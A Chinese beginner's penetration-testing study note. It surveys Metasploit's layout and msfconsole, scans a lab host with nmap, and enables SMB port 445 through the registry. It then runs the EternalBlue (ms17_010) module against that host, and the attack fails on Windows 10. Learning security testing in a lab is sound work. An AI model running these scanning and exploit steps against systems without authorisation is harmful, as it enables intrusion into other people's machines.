开始学习kail渗透攻击
我一个做开发为什么想去学习一个安全问题知识
1.安全的入门比较低
2. 会一些基础的linux命令就可以
3.基本都渗透学习方便入门
4.学习安全方便以后的兼职挖漏洞
5.开发兼职就是需要一个团队,但是安全的兼职,你只需要会使用工具和了解安全方面的技巧就可以
学习metasploit工具
1.metasploit主要是用来做攻击使用的
2. 目录结构
1. data : 包含某些漏洞信心
2.documentation: 文档信心
3. lib: metasploit 库的文件信心
4. puugin: 插件信息
5. scripts: 用来存放mesp 脚步
6. tools 存放多个方式信息
7.models: 存储mesasploit模块文件信息
2.mscconsole 是metasploit框架用户接口使用
1.管理metasploti数据库
2.管理会话
3.配置启动mrtaspoit模块
如何使用msfconsole
启动命令
msfconsole
扫描目标主机
nmap -Pn 192.168.126.155
-Pn 参数的含义是将所有指定的主机视作开启的,并跳过主机发现的过程
-Pn 参数可以加快扫描速度
注意: 并且不会尝试进行ping探测或其他形式的主机发现
开通的端口只有一个 5357 端口开放
我们需要让主机开通445端口我们在可以复现漏洞信息
如何让主机开通445端口
打开注册表
填入 regedit
找到 SMBDeviceEnabled(如果存在这个值直接修改值为1,如果不存在重新创建值就可以)
查看445端口是否开启
netstat -an
查看漏洞模块
查看模块漏洞
msf6 > search ms17_010
使用模块
msf6 > use 0
查看参数(required是必填参数其他可以选填)
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
设置参数
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHoSTS 192.168.126.155
开始攻击
run
攻击失败了
我这里看了,我选择攻击是window10系统的
